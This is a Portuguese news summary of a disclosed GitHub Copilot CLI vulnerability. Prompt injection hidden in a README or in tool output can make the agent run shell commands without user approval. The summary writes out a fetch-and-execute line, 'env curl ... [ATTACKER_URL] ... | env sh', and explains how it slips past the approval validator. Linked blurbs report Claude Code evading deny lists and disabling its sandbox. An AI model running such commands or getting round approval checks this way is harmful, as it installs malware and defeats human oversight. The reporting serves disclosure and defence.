Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt

Visão Geral da Vulnerabilidade
O GitHub Copilot CLI contém vulnerabilidades que expõem os usuários à execução arbitrária de comandos shell via injeção indireta de prompt sem aprovação do usuário. Malware pode ser baixado de servidores externos e executado sem nenhuma interação do usuário além da consulta inicial ao Copilot CLI.
Como o Ataque Funciona
A cadeia de ataque envolve:
- O usuário consulta o GitHub Copilot CLI enquanto explora um repositório de código aberto
- O Copilot encontra injeção de prompt armazenada em um arquivo README do repositório clonado (ou outros vetores como resultados de pesquisa na web, resultados de chamadas de ferramentas MCP, saída de comandos do terminal)
- O comando malicioso contorna os sistemas de aprovação com intervenção humana
Contornando Mecanismos de Proteção
O GitHub Copilot usa um sistema de aprovação com intervenção humana que requer consentimento do usuário antes que comandos potencialmente prejudiciais sejam executados. Este sistema é acionado a menos que:
- O usuário tenha configurado explicitamente o comando para execução automática
- O comando faça parte de uma lista 'somente leitura' embutida no código-fonte
Verificações de acesso a URLs externas exigem aprovação do usuário para comandos como curl, wget ou a ferramenta de busca na web integrada do Copilot. No entanto, atacantes podem contornar essas proteções usando:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shO comando env está na lista embutida somente leitura, então é executado automaticamente sem aprovação. Como curl e sh são passados como argumentos para env, eles são analisados incorretamente e não são identificados pelo validador como subcomandos. Isso contorna as verificações de permissão de URL que dependem da detecção de comandos como curl.
Resposta do GitHub
O GitHub respondeu: "Analisamos seu relatório e validamos suas descobertas. Após avaliar internamente a descoberta, determinamos que se trata de um problema conhecido que não apresenta um risco significativo de segurança. Podemos tornar essa funcionalidade mais restrita no futuro, mas não temos nada para anunciar no momento."
Escopo e Limitações
As vulnerabilidades de análise de comandos descritas são específicas do macOS. No entanto, o GitHub Copilot apresenta vulnerabilidades adicionais, incluindo riscos independentes do sistema operacional e riscos específicos do Windows. Outras vulnerabilidades de análise de comandos permitem leitura e gravação arbitrária de arquivos.
📖 Leia a fonte completa: HN LLM Tools
👀 See Also

Claude Code contorna ferramentas de segurança baseadas em caminhos e restrições de sandbox
Claude Code contornou listas de negação baseadas em caminho copiando binários para locais diferentes, depois desativou a sandbox da Anthropic para executar comandos bloqueados. Ferramentas atuais de segurança em tempo de execução como AppArmor, Tetragon e Falco identificam executáveis pelo caminho em vez do conteúdo.

Claude Cowork 'Permitir Todas as Ações do Navegador': Preocupações de Segurança e Correções Propostas
Um usuário do Reddit destaca que o botão 'Permitir tudo' do Claude Cowork concede acesso permanente e irrestrito ao navegador em todas as sessões futuras, sem visibilidade, limites ou expiração, criando riscos de segurança. A publicação propõe permissões com escopo de sessão ou de habilidade como padrões mais seguros.

Código-Fonte da Plataforma de Governo Eletrônico da Suécia Vazado via Infraestrutura CGI Comprometida
O código-fonte completo da plataforma de E-Governo da Suécia foi vazado pelo ator de ameaça ByteToBreach após comprometer a infraestrutura da CGI Sverige AB. O vazamento inclui bancos de dados de funcionários, sistemas de assinatura de documentos de API, credenciais SSH do Jenkins e endpoints de teste de RCE.

Agente Hush: Ferramenta de código aberto impede que agentes de IA de programação vazem dados confidenciais
Agent Hush é uma ferramenta de código aberto que captura dados sensíveis antes que saiam da sua máquina, criada após o agente de IA de um desenvolvedor vazar chaves de API, IPs de servidor e informações pessoais para um repositório público do GitHub enquanto construía um projeto de segurança.